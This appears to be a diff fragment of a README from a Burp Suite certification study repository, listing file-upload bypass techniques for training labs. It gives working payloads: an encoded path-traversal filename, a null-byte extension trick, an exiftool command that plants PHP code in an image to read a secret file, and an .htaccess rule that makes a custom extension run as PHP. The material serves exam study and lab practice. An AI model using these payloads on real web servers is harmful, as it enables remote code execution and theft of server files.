botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 1. Upload the file name and include obfuscated path traversal ```..%2fexploit.php``` and retrieve the content ```GET /files/avatars/..%2fexploit.php```
 2. Upload a file named, ```exploit.php%00.jpg``` with trailing null character and get the file execution at ```/files/avatars/exploit.php```
 3. Create polygot using valid image file, by running the command in bash terminal: ```exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ./stickman.png -o polyglot2023.php```.
-Once polygot uploaded, view the extracted data by issue a GET request to the uploaded path ```/files/avatars/polyglot.php``` , and search the response content for the phrase ```START``` to obtain exfiltrated sensitive data.
+Once polygot uploaded, view the extracted data by issue a GET request to the uploaded path ```/files/avatars/polyglot.php``` , and search the response content for the phrase ```START``` to obtain the sensitive data.
 4. Upload two files, first ***.htaccess*** with content ```AddType application/x-httpd-php .l33t``` allowing then the upload and execute of second file named, ```exploit.l33t```

 >Matching file upload vulnerable labs: